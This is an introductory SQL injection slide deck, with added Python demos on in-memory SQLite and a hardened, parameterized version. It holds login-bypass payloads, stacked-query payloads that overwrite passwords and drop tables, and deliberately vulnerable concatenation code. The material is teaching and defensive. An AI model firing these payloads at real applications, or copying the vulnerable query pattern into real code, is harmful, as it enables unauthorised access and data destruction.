SQL Injection

A Basic Presentation about the SQL Injection and how it works

Bhaskar Machcha

October 12, 2012

Transcript

  1. What is SQL?
     - SQL stands for Structured Query Language.
     - It allows us to access the database.
     - SQL can:
       - execute queries against a database
       - retrieve data from a database
       - insert new records into a database
       - delete records from a database
  2. What is SQL Injection?
     - The ability to inject SQL commands into the database engine through an existing application, by supplying input that the application pastes into a query as if it were part of the SQL.
  3. How common is it?
     - It is probably the most common website vulnerability today.
     - It is a flaw in web application development; it is not a database or web server problem.
     - In our pen tests over 60% of our clients turn out to be vulnerable to SQL Injection.
  4. Vulnerable applications
     - Almost all databases are affected, because the flaw is in how the application builds the query, not in the database:
       MS SQL Server, Oracle, MySQL, Postgres, DB2, MS Access, Sybase, etc.
  5. How does it work?
     - Common vulnerable login query:
       SELECT * FROM users WHERE login = 'victor' AND password = '123'
       (if it returns a row, the user is logged in)
     - ASP/MS SQL Server login syntax:
       var sql = "SELECT * FROM users WHERE login = '" + formusr + "' AND password = '" + formpwd + "'";
  6. Injecting through strings
     formusr = ' or 1=1 --
     formpwd = anything
     - Final query would look like this:
       SELECT * FROM users WHERE login = '' or 1=1 -- ' AND password = 'anything'
     - The first ' closes the login string, "or 1=1" makes the WHERE clause true for every row, and -- comments out the password check entirely.
  7. The power of '
     - It closes the string parameter; everything after it is treated as part of the SQL command.
     - Misleading Internet suggestions include: "escape it!" (replace ' with ''). That only helps for fields that are quoted in the first place.
     - String fields are very common, but there are other types of fields: numeric, dates.
  8. If it were numeric?
     SELECT * FROM clients WHERE account = 12345678 AND pin = 1111
     - PHP/MySQL login syntax:
       $sql = "SELECT * FROM clients WHERE " . "account = $formacct AND " . "pin = $formpin";
  9. Injecting a numeric field
     $formacct = 1 or 1=1 #
     $formpin = 1111
     - Final query would look like this:
       SELECT * FROM clients WHERE account = 1 or 1=1 # AND pin = 1111
     - No quote is needed, so escaping quotes does nothing here; # is MySQL's single-line comment.
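
The string and numeric injections from slides 5 to 9, run against an in-memory SQLite database as an added example (this is not code from the original deck). The users and clients tables and their single rows are constructed for the demo. SQLite uses -- as its line comment, so the numeric payload uses -- where the MySQL slide used #. The login_escaped and pin_check_escaped functions implement the "replace ' with ''" suggestion from slide 7, to show that it stops the string payload but does nothing against the numeric one.

```python
import sqlite3


def make_db():
    """Constructed sample data for the demo: the two tables the slides use."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE users (login TEXT, password TEXT);
        INSERT INTO users VALUES ('victor', '123');
        CREATE TABLE clients (account INTEGER, pin INTEGER);
        INSERT INTO clients VALUES (12345678, 1111);
        """
    )
    return con


def escape_quotes(value):
    """The 'escape it!' suggestion from slide 7: double every single quote."""
    return value.replace("'", "''")


def login_concat(con, formusr, formpwd):
    """Vulnerable: the slide 5 login query built by string concatenation."""
    sql = ("SELECT * FROM users WHERE login = '" + formusr
           + "' AND password = '" + formpwd + "'")
    return con.execute(sql).fetchone() is not None


def login_escaped(con, formusr, formpwd):
    """Same query with quotes doubled; sufficient for a quoted string field."""
    return login_concat(con, escape_quotes(formusr), escape_quotes(formpwd))


def pin_check_concat(con, formacct, formpin):
    """Vulnerable: the slide 8 numeric query, no quotes around the values."""
    sql = ("SELECT * FROM clients WHERE account = " + formacct
           + " AND pin = " + formpin)
    return con.execute(sql).fetchone() is not None


def pin_check_escaped(con, formacct, formpin):
    """Quote-doubling applied to the numeric query: nothing to double, no effect."""
    return pin_check_concat(con, escape_quotes(formacct), escape_quotes(formpin))


if __name__ == "__main__":
    con = make_db()
    # Slide 6 payload: closes the string, ORs in a true condition, comments out the rest.
    print(login_concat(con, "' or 1=1 -- ", "anything"))     # True: logged in without a password
    print(login_escaped(con, "' or 1=1 -- ", "anything"))    # False: the quote is now plain data
    # Slide 9 payload: no quote needed, so escaping quotes changes nothing.
    print(pin_check_concat(con, "1 or 1=1 -- ", "1111"))     # True
    print(pin_check_escaped(con, "1 or 1=1 -- ", "1111"))    # True
```

The trailing space after -- in the payloads is deliberate: MySQL only treats -- as a comment when it is followed by whitespace, and keeping the space makes the same payload portable across the databases on slide 4.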
  10. SQL Injection characters
     - ' or "                    string delimiters
     - -- or #                   single-line comment (MySQL requires a space after --)
     - /* ... */                 multi-line comment
     - +                         addition, string concatenation (or a space in a URL)
     - ||                        string concatenation (double pipe)
     - %                         wildcard in LIKE patterns
     - ?Param1=foo&Param2=bar    URL parameters
     - PRINT                     useful as a non-transactional command (MS SQL Server)
     - @variable                 local variable (MS SQL Server)
     - @@variable                global variable / system function (MS SQL Server)
     - waitfor delay '0:0:10'    time delay (MS SQL Server)
  11. Inserting data into the DB
     - Using a stacked query (a second statement after the ;) you can insert data into the website's database:
       Syntax:  B'; insert into <tablename> values (<col1, col2, ...>); --
       Example: B'; insert into signup values (55, 'Abc', 'xxx', 'yyy'); --
  12. Updating data
     - The same way we can update the passwords of all the users:
       Syntax:  X'; update <tablename> set pass='<yourvalue>'; --
       Example: X'; update signup set pass='nnn'; --
  13. Dropping tables
     - You can also drop the tables of the victim's web application:
       Syntax:  X'; drop table <tablename>; --
       Example: X'; drop table signup; --
     - Stacked queries only work where the database and driver execute a batch of statements: MS SQL Server via ADO does, while PHP's mysql_query() runs a single statement and rejects the rest.
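
An added example (not from the deck) of why the stacked-query payloads on slides 11 to 13 depend on the driver. It uses a constructed signup table in SQLite. executescript() runs the whole string as a batch, the way ADO does against MS SQL Server, so the update and drop statements execute; execute() accepts exactly one statement and raises on the second, which is the behaviour of a single-statement API such as PHP's mysql_query().

```python
import sqlite3


def make_db():
    """Constructed sample table for the demo, shaped like the deck's signup table."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE signup (id INTEGER, name TEXT, pass TEXT, email TEXT);
        INSERT INTO signup VALUES (1, 'alice', 'secret', 'alice@example.test');
        """
    )
    return con


def table_exists(con, name):
    row = con.execute(
        "SELECT 1 FROM sqlite_master WHERE type = 'table' AND name = ?", (name,)
    ).fetchone()
    return row is not None


def lookup_by_name(con, name, batch):
    """Vulnerable lookup: the name is concatenated straight into the query.

    batch=True runs the string through executescript(), which executes every
    statement in it (a batch-capable API).  batch=False uses execute(), which
    accepts one statement and raises if a second one follows.
    """
    sql = "SELECT * FROM signup WHERE name = '" + name + "'"
    if batch:
        con.executescript(sql)
    else:
        con.execute(sql)


def demo():
    """Run the slide 12 and slide 13 payloads against both kinds of API."""
    results = {}

    # Batch API: the injected UPDATE and DROP TABLE statements really run.
    con = make_db()
    lookup_by_name(con, "X'; update signup set pass='nnn'; --", batch=True)
    results["password_after_update"] = con.execute(
        "SELECT pass FROM signup WHERE id = 1"
    ).fetchone()[0]
    lookup_by_name(con, "X'; drop table signup; --", batch=True)
    results["table_survives_batch"] = table_exists(con, "signup")

    # Single-statement API: the driver refuses the stacked query before anything runs.
    con = make_db()
    try:
        lookup_by_name(con, "X'; drop table signup; --", batch=False)
        results["single_statement_rejected"] = False
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        # Older Pythons raise sqlite3.Warning here, newer ones ProgrammingError.
        results["single_statement_rejected"] = True
    results["table_survives_single"] = table_exists(con, "signup")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The single-statement case is not a defence: the same concatenated query is still injectable through UNION SELECT, subqueries and conditional delays, it just cannot be turned into a second statement.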
  14. Impact of SQL Injection
     - Leakage of sensitive information.
     - Modification of sensitive information.
     - Reputation decline.
  15. SQL Injection attacks are a serious threat
     - OWASP vulnerabilities (2004), OWASP vulnerabilities (2006)
     - CardSystems Solutions security breach (2005): 263,000 customer credit card numbers stolen, 40 million more exposed.
  16. Preventing SQL Injection
     - Use parameterized queries (C#/ADO.NET):
       string sql = "SELECT * FROM Users WHERE user = @user AND pwd = @pwd";
       SqlCommand cmd = new SqlCommand(sql, con);
       cmd.Parameters.AddWithValue("@user", User.Text);
       cmd.Parameters.AddWithValue("@pwd", Password.Text);
       The values travel to the server as data bound to @user and @pwd; they are never parsed as SQL.
     - Use stored procedures, but only if they do not build dynamic SQL from their arguments internally (EXEC of a concatenated string is injectable too).
  17. Continued
     - Restrict function access from PUBLIC to PRIVATE: revoke execute rights on stored procedures and extended system procedures from the PUBLIC role.
     - Don't display error messages that reveal details about the database; log them server-side and show the user a generic message.
     - Store password hashes, not plaintext passwords.
     - Use database-specific user privileges: the account the application connects with should have only the rights it needs (no DROP, no administrative rights).
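
The hardened counterpart of the vulnerable login and PIN checks, as an added example that is not part of the original deck. It follows slides 16 and 17: parameterized queries (SQLite's ? placeholders standing in for ADO.NET's @user and @pwd), stored password hashes instead of plaintext, and type validation for the numeric field. The users and clients rows are constructed for the demo, and the PBKDF2 iteration count is an assumed value.

```python
import hashlib
import hmac
import os
import sqlite3

PBKDF2_ROUNDS = 100_000  # assumed value for the demo; tune to your hardware


def hash_password(password, salt=None):
    """Salted PBKDF2-HMAC-SHA256; returns (salt, digest)."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)
    return salt, digest


def make_db():
    """Constructed sample data: one user and one client, as on the slides."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (login TEXT PRIMARY KEY, salt BLOB, pwhash BLOB)")
    salt, digest = hash_password("123")
    con.execute("INSERT INTO users VALUES (?, ?, ?)", ("victor", salt, digest))
    con.execute("CREATE TABLE clients (account INTEGER, pin INTEGER)")
    con.execute("INSERT INTO clients VALUES (?, ?)", (12345678, 1111))
    return con


def login(con, formusr, formpwd):
    """Parameterized login: the ? placeholder sends the input as data, never as SQL."""
    row = con.execute(
        "SELECT salt, pwhash FROM users WHERE login = ?", (formusr,)
    ).fetchone()
    if row is None:
        return False  # unknown user, or a payload such as ' or 1=1 -- matched nothing
    salt, stored = row
    _, candidate = hash_password(formpwd, salt)
    # Constant-time comparison of the stored hash against the candidate.
    return hmac.compare_digest(candidate, stored)


def pin_check(con, formacct, formpin):
    """Numeric fields: validate the type first, then bind as parameters."""
    try:
        account, pin = int(formacct), int(formpin)
    except ValueError:
        return False  # "1 or 1=1 --" is not a number; reject it before it reaches SQL
    row = con.execute(
        "SELECT 1 FROM clients WHERE account = ? AND pin = ?", (account, pin)
    ).fetchone()
    return row is not None


if __name__ == "__main__":
    con = make_db()
    print(login(con, "victor", "123"))              # True
    print(login(con, "' or 1=1 -- ", "anything"))   # False
    print(pin_check(con, "12345678", "1111"))       # True
    print(pin_check(con, "1 or 1=1 -- ", "1111"))   # False
```

With placeholders the slide 6 payload is looked up as a login literally named "' or 1=1 -- ", and the slide 9 payload never reaches the database at all because it fails the integer check. Pair this with a database account that cannot DROP or ALTER, so that even a missed concatenation elsewhere cannot take the schema down.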
  18. Conclusion
     - SQL Injection continues to evolve with new technologies.
     - Dangerous effects:
       - access to critical information
       - updating data not meant to be updated
       - exploiting the DBMS to directly affect the server and its resources
     - Prevention of SQL Injection:
       - input validation and safe query building
       - permissions and access rights
       - variable placeholders (prepared statements) and stored procedures